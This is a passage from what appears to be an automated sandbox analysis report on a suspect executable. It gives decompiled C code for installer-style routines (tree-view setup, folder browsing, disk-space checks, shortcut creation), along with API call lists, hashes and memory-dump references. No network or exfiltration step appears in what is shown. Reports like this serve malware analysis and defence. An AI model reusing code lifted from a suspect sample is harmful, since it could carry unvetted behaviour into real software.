									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42052c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42052c + _t318 * 4) = _t274;
									_t288 =  *( *0x42052c + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x423f6c; // 0x3
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403E89(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403E89(_v12);
								L89:
								return E00403EBB(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}






































































                        0x004047f1
                        0x004047f7
                        0x004047f9
                        0x004047ff
                        0x00404805
                        0x00404808
                        0x00404812
                        0x0040481b
                        0x0040481e
                        0x00404821
                        0x00404a49
                        0x00404a49
                        0x00404a50
                        0x00404a64
                        0x00404a52
                        0x00404a54
                        0x00404a57
                        0x00404a58
                        0x00404a5f
                        0x00404a5f
                        0x00404a67
                        0x00404a70
                        0x00404a7b
                        0x00404a7b
                        0x00404a7e
                        0x00404a81
                        0x00404a90
                        0x00404a90
                        0x00404a97
                        0x00404b0f
                        0x00404b0f
                        0x00404b12
                        0x00404b14
                        0x00404b17
                        0x00404b1e
                        0x00404b2c
                        0x00404b2c
                        0x00404b2e
                        0x00404b31
                        0x00404b38
                        0x00404b3a
                        0x00404b3e
                        0x00404b5b
                        0x00404b5f
                        0x00404b5f
                        0x00404b40
                        0x00404b4d
                        0x00404b4d
                        0x00404b3e
                        0x00404b38
                        0x00000000
                        0x00404b12
                        0x00404a99
                        0x00404a9c
                        0x00404aa7
                        0x00404aa9
                        0x00404aac
                        0x00404ab3
                        0x00404ab8
                        0x00404aba
                        0x00404ac4
                        0x00404ac4
                        0x00404ac8
                        0x00404aca
                        0x00404acd
                        0x00404acf
                        0x00404ad2
                        0x00404ae8
                        0x00404ae8
                        0x00404ad4
                        0x00404ad4
                        0x00404ada
                        0x00404adc
                        0x00404ae3
                        0x00404ade
                        0x00404ade
                        0x00404ade
                        0x00404adc
                        0x00404aec
                        0x00404aee
                        0x00404af3
                        0x00404afc
                        0x00404afd
                        0x00404b07
                        0x00404b07
                        0x00404b09
                        0x00404b0c
                        0x00404b0c
                        0x00404acd
                        0x00000000
                        0x00404aba
                        0x00404a9e
                        0x00404aa1
                        0x00404aa5
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00404aa5
                        0x00404a83
                        0x00404a8a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00404a72
                        0x00404a72
                        0x00404a75
                        0x00404b62
                        0x00404b62
                        0x00404b69
                        0x00404bdd
                        0x00404bdd
                        0x00404be4
                        0x00404bf0
                        0x00404bf0
                        0x00404bf2
                        0x00404bf9
                        0x00404bfb
                        0x00404c00
                        0x00404c02
                        0x00404c05
                        0x00404c05
                        0x00404c0b
                        0x00404c10
                        0x00404c12
                        0x00404c15
                        0x00404c15
                        0x00404c1b
                        0x00404c21
                        0x00404c27
                        0x00404c27
                        0x00404c2d
                        0x00404c34
                        0x00404d81
                        0x00404d81
                        0x00404d88
                        0x00404d8a
                        0x00404d91
                        0x00404d95
                        0x00404da2
                        0x00404da2
                        0x00404da5
                        0x00404dab
                        0x00404dbd
                        0x00404dbd
                        0x00404d91
                        0x00000000
                        0x00404c3a
                        0x00404c3c
                        0x00404c41
                        0x00404c44
                        0x00404c48
                        0x00404c48
                        0x00404c4d
                        0x00404c50
                        0x00404c91
                        0x00404c93
                        0x00404c9d
                        0x00404ca3
                        0x00404ca6
                        0x00404cab
                        0x00404cb2
                        0x00404cb5
                        0x00404d57
                        0x00404d5d
                        0x00404d63
                        0x00404d68
                        0x00404d6b
                        0x00404d7c
                        0x00404d7c
                        0x00000000
                        0x00404cbb
                        0x00404cbb
                        0x00404cbb
                        0x00404cbe
                        0x00404cc4
                        0x00404cc7
                        0x00404cc9
                        0x00404ccb
                        0x00404ccd
                        0x00404cd0
                        0x00404cd3
                        0x00404cda
                        0x00404cdc
                        0x00404cdf
                        0x00404ce6
                        0x00404ce9
                        0x00404ce9
                        0x00404ce9
                        0x00404ce9
                        0x00404ced
                        0x00404cf0
                        0x00404cfc
                        0x00404cfd
                        0x00404d00
                        0x00404d02
                        0x00404d02
                        0x00404d02
                        0x00404cf2
                        0x00404cf4
                        0x00404cf4
                        0x00404d21
                        0x00404d21
                        0x00404d22
                        0x00404d2e
                        0x00404d3d
                        0x00404d3d
                        0x00404d3f
                        0x00404d42
                        0x00404d4b
                        0x00404d4b
                        0x00000000
                        0x00404cbe
                        0x00404c52
                        0x00404c5d
                        0x00404c60
                        0x00404c65
                        0x00404c67
                        0x00404c69
                        0x00404c6b
                        0x00404c7b
                        0x00404c85
                        0x00404c87
                        0x00404c8a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00404c6d
                        0x00404c6d
                        0x00404c6d
                        0x00404c70
                        0x00404c73
                        0x00404c75
                        0x00404c75
                        0x00404c75
                        0x00404c76
                        0x00404c77
                        0x00404c77
                        0x00000000
                        0x00404c6d
                        0x00404c50
                        0x00404c34
                        0x00404b6b
                        0x00404b71
                        0x00000000
                        0x00000000
                        0x00404b7d
                        0x00404b81
                        0x00000000
                        0x00000000
                        0x00404b91
                        0x00404b93
                        0x00404b96
                        0x00000000
                        0x00000000
                        0x00404ba8
                        0x00404baa
                        0x00404bad
                        0x00404bb7
                        0x00404bb9
                        0x00404bba
                        0x00404bbb
                        0x00404bca
                        0x00404bcc
                        0x00404bd3
                        0x00404bd6
                        0x00000000
                        0x00404bd6
                        0x00404baf
                        0x00404bb2
                        0x00404bb5
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00404bb5
                        0x00000000
                        0x00404a75
                        0x00404827
                        0x0040482c
                        0x00404831
                        0x00404836
                        0x00404837
                        0x00404840
                        0x0040484b
                        0x00404856
                        0x0040485c
                        0x0040486a
                        0x0040487f
                        0x00404884
                        0x0040488f
                        0x00404898
                        0x004048ad
                        0x004048be
                        0x004048cb
                        0x004048cb
                        0x004048d0
                        0x004048d6
                        0x004048d8
                        0x004048db
                        0x004048e0
                        0x004048e5
                        0x004048e7
                        0x004048e7
                        0x00404907
                        0x00404907
                        0x00404909
                        0x0040490a
                        0x0040490f
                        0x00404912
                        0x00404915
                        0x00404919
                        0x0040491e
                        0x00404923
                        0x00404927
                        0x0040492c
                        0x00404931
                        0x00404933
                        0x00404935
                        0x0040493b
                        0x00404a05
                        0x00404a18
                        0x00000000
                        0x00404941
                        0x00404944
                        0x00404947
                        0x0040494a
                        0x0040494a
                        0x00404950
                        0x00404956
                        0x00404959
                        0x0040495f
                        0x00404960
                        0x00404965
                        0x0040496e
                        0x00404975
                        0x00404978
                        0x0040497b
                        0x0040497e
                        0x004049b8
                        0x004049ba
                        0x004049e3
                        0x004049bc
                        0x004049c9
                        0x004049c9
                        0x00404980
                        0x00404983
                        0x00404992
                        0x0040499c
                        0x004049a4
                        0x004049ab
                        0x004049b3
                        0x004049b3
                        0x0040497e
                        0x004049e9
                        0x004049ea
                        0x004049f0
                        0x004049f6
                        0x004049f6
                        0x00404a03
                        0x00404a1e
                        0x00404a22
                        0x00404a3f
                        0x00404a44
                        0x00404a47
                        0x00404a47
                        0x00000000
                        0x00404a24
                        0x00404a29
                        0x00404a32
                        0x00404dbf
                        0x00404dd1
                        0x00404dd1
                        0x00404a22
                        0x00000000
                        0x00404a03
                        0x0040493b

                        APIs
                        • GetDlgItem.USER32 ref: 004047EA
                        • GetDlgItem.USER32 ref: 004047F7
                        • GlobalAlloc.KERNEL32(00000040,00000003), ref: 00404843
                        • LoadBitmapA.USER32 ref: 00404856
                        • SetWindowLongA.USER32 ref: 00404870
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404884
                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404898
                        • SendMessageA.USER32(?,00001109,00000002), ref: 004048AD
                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048B9
                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048CB
                        • DeleteObject.GDI32(?), ref: 004048D0
                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004048FB
                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404907
                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 0040499C
                        • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049C7
                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049DB
                        • GetWindowLongA.USER32 ref: 00404A0A
                        • SetWindowLongA.USER32 ref: 00404A18
                        • ShowWindow.USER32(?,00000005), ref: 00404A29
                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B2C
                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404B91
                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BA6
                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BCA
                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404BF0
                        • ImageList_Destroy.COMCTL32(?), ref: 00404C05
                        • GlobalFree.KERNEL32 ref: 00404C15
                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404C85
                        • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404D2E
                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D3D
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D5D
                        • ShowWindow.USER32(?,00000000), ref: 00404DAB
                        • GetDlgItem.USER32 ref: 00404DB6
                        • ShowWindow.USER32(00000000), ref: 00404DBD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                        • String ID: $M$N
                        • API String ID: 1638840714-813528018
                        • Opcode ID: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                        • Instruction ID: 9a6d62add78faf2b4aa272e1cf177665df16ecedb9a61d3aa4425c18576eb247
                        • Opcode Fuzzy Hash: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                        • Instruction Fuzzy Hash: 8B029DB0E00209AFDB24DF55DD45AAE7BB5EB84315F10817AF610BA2E1C7789A81CF58
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404292, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 273stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 78%
                        			E00404292(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x41fd08;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040543D(0x3fb, _t146);
					E00405DFA(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040543D(0x3fb, _t146);
							if(E0040576C(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405B98(0x41f500, _t146);
							_t87 = E00405F28(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405B98(0x41f500, _t146);
								_t89 = E0040571F(0x41f500);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f500,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x41f500) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x41f500,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t159 = E004056D2(0x41f500) - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x41f500) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404726(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42371c; // 0x578476
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E0040470E(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x41f4f0);
									} else {
										E00404649(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x423fe4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403E76(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x420524 == _t158) {
									E00404227();
								}
								 *0x420524 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x420538;
							_v60 = E004045E3;
							_v56 = _t146;
							_v68 = E00405BBA(_t146, 0x420538, _t166, 0x41f908, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E0040568B(_t146);
								_t124 =  *0x423f50; // 0x571700
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t146 == "C:\\Users\\engineer\\AppData\\Local\\Temp") {
									E00405BBA(_t146, 0x420538, _t166, 0, _t125);
									if(lstrcmpiA(0x422ee0, 0x420538) != 0) {
										lstrcatA(_t146, 0x422ee0);
									}
								}
								 *0x420524 =  *0x420524 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E004056F8(_t146) != 0 && E0040571F(_t146) == 0) {
						E0040568B(_t146);
					}
					 *0x423718 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E54(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E54(_t166);
					E00403E89(_t165);
					_t138 = E00405F28(0xa);
					if(_t138 == 0) {
						L53:
						return E00403EBB(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                        0x00404292
                        0x00404298
                        0x0040429e
                        0x004042ab
                        0x004042b9
                        0x004042bc
                        0x004042c4
                        0x004042ca
                        0x004042ca
                        0x004042d6
                        0x004042d9
                        0x00404347
                        0x0040434e
                        0x00404425
                        0x0040442c
                        0x0040443b
                        0x0040443b
                        0x0040443f
                        0x00404449
                        0x00404456
                        0x00404458
                        0x00404458
                        0x00404466
                        0x0040446d
                        0x00404474
                        0x00404477
                        0x004044ae
                        0x004044b0
                        0x004044b6
                        0x004044bb
                        0x004044bf
                        0x004044c1
                        0x004044c1
                        0x004044dd
                        0x00000000
                        0x004044df
                        0x004044e2
                        0x004044f0
                        0x004044f6
                        0x004044f7
                        0x004044fa
                        0x004044fd
                        0x00000000
                        0x004044fd
                        0x00404479
                        0x0040447b
                        0x0040447f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00404481
                        0x00404481
                        0x0040448e
                        0x00404493
                        0x00000000
                        0x00000000
                        0x00404497
                        0x00404499
                        0x00404499
                        0x004044a4
                        0x004044a7
                        0x004044ac
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004044ac
                        0x00404509
                        0x00404513
                        0x00404516
                        0x00404519
                        0x00404520
                        0x00404520
                        0x00404522
                        0x00404522
                        0x00404527
                        0x00404529
                        0x00404531
                        0x00404538
                        0x0040453a
                        0x00404545
                        0x00404545
                        0x0040453a
                        0x0040454c
                        0x00404555
                        0x0040455f
                        0x00404567
                        0x00404582
                        0x00404569
                        0x00404572
                        0x00404572
                        0x00404567
                        0x00404587
                        0x0040458c
                        0x00404591
                        0x0040459a
                        0x0040459a
                        0x004045a3
                        0x004045a5
                        0x004045a5
                        0x004045b1
                        0x004045b9
                        0x004045c3
                        0x004045c3
                        0x004045c8
                        0x00000000
                        0x004045c8
                        0x00404477
                        0x0040442e
                        0x00404435
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00404435
                        0x00404354
                        0x0040435d
                        0x00404377
                        0x0040437c
                        0x00404386
                        0x0040438d
                        0x00404399
                        0x0040439c
                        0x0040439f
                        0x004043a6
                        0x004043ae
                        0x004043b1
                        0x004043b5
                        0x004043bc
                        0x004043c4
                        0x0040441e
                        0x004043c6
                        0x004043c7
                        0x004043ce
                        0x004043d3
                        0x004043d8
                        0x004043e0
                        0x004043ed
                        0x00404401
                        0x00404405
                        0x00404405
                        0x00404401
                        0x0040440a
                        0x00404417
                        0x00404417
                        0x004043c4
                        0x00000000
                        0x0040437c
                        0x0040436a
                        0x00000000
                        0x00000000
                        0x00404370
                        0x00000000
                        0x004042db
                        0x004042e8
                        0x004042f1
                        0x004042fe
                        0x004042fe
                        0x00404305
                        0x0040430b
                        0x00404314
                        0x00404317
                        0x0040431a
                        0x00404322
                        0x00404325
                        0x00404328
                        0x0040432e
                        0x00404335
                        0x0040433c
                        0x004045ce
                        0x004045e0
                        0x00404342
                        0x00404345
                        0x00000000
                        0x00404345
                        0x0040433c

                        APIs
                        • GetDlgItem.USER32 ref: 004042E1
                        • SetWindowTextA.USER32(00000000,?), ref: 0040430B
                        • SHBrowseForFolderA.SHELL32(?,0041F908,?), ref: 004043BC
                        • CoTaskMemFree.OLE32(00000000), ref: 004043C7
                        • lstrcmpiA.KERNEL32(kzopaqjcb,00420538,00000000,?,?), ref: 004043F9
                        • lstrcatA.KERNEL32(?,kzopaqjcb), ref: 00404405
                        • SetDlgItemTextA.USER32 ref: 00404417
                          • Part of subcall function 0040543D: GetDlgItemTextA.USER32 ref: 00405450
                          • Part of subcall function 00405DFA: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\aZOmps0Ug8.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E52
                          • Part of subcall function 00405DFA: CharNextA.USER32(?,?,?,00000000), ref: 00405E5F
                          • Part of subcall function 00405DFA: CharNextA.USER32(?,"C:\Users\user\Desktop\aZOmps0Ug8.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E64
                          • Part of subcall function 00405DFA: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E74
                        • GetDiskFreeSpaceA.KERNEL32(0041F500,?,?,0000040F,?,0041F500,0041F500,?,00000001,0041F500,?,?,000003FB,?), ref: 004044D5
                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044F0
                          • Part of subcall function 00404649: lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                          • Part of subcall function 00404649: wsprintfA.USER32 ref: 004046EF
                          • Part of subcall function 00404649: SetDlgItemTextA.USER32 ref: 00404702
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                        • String ID: A$C:\Users\user\AppData\Local\Temp$kzopaqjcb
                        • API String ID: 2624150263-3144460483
                        • Opcode ID: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                        • Instruction ID: cfccd4b73e861dd9bc9b7885d3f414f2f86db1ffcc16c92a650f1104495a78a5
                        • Opcode Fuzzy Hash: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                        • Instruction Fuzzy Hash: EAA17EB1D00218BBDB11AFA5CD41AAFB6B8EF84315F10813BF605B62D1D77C9A418F69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402053, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                        Download Yara Rule
                        C-Code - Quality: 74%
                        			E00402053() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A29(0xfffffff0);
				_t96 = E00402A29(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A29(2);
				 *((intOrPtr*)(_t100 - 0xc)) = E00402A29(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x38)) = E00402A29(0x45);
				if(E004056F8(_t96) == 0) {
					E00402A29(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x4073f8, _t75, 1, 0x4073e8, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407408, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\engineer\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x18);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x18);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409408, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 8));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409408, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                        0x0040205c
                        0x00402066
                        0x0040206f
                        0x00402079
                        0x00402082
                        0x0040208c
                        0x00402090
                        0x00402090
                        0x00402095
                        0x004020a6
                        0x004020ae
                        0x0040218e
                        0x0040218e
                        0x00402195
                        0x004020b4
                        0x004020b4
                        0x004020c5
                        0x004020c9
                        0x004020cf
                        0x004020d9
                        0x004020db
                        0x004020e6
                        0x004020e9
                        0x004020f6
                        0x004020f8
                        0x004020fa
                        0x00402101
                        0x00402104
                        0x00402104
                        0x00402107
                        0x00402111
                        0x00402119
                        0x0040211e
                        0x0040212a
                        0x0040212a
                        0x0040212d
                        0x00402136
                        0x00402139
                        0x00402142
                        0x00402147
                        0x00402159
                        0x00402168
                        0x0040216a
                        0x00402176
                        0x00402176
                        0x00402168
                        0x00402178
                        0x0040217e
                        0x0040217e
                        0x00402181
                        0x00402187
                        0x0040218c
                        0x004021a1
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040218c
                        0x00402197
                        0x004028c1
                        0x004028cd

                        APIs
                        • CoCreateInstance.OLE32(004073F8,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020A6
                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409408,00000400,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                        Strings
                        • C:\Users\user\AppData\Local\Temp, xrefs: 004020DE
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWide
                        • String ID: C:\Users\user\AppData\Local\Temp
                        • API String ID: 123533781-1104044542
                        • Opcode ID: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                        • Instruction ID: c7e9304a010c998f9a7959bd005017a1970e80d3ce8bb7043a01564e87abbd95
                        • Opcode Fuzzy Hash: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
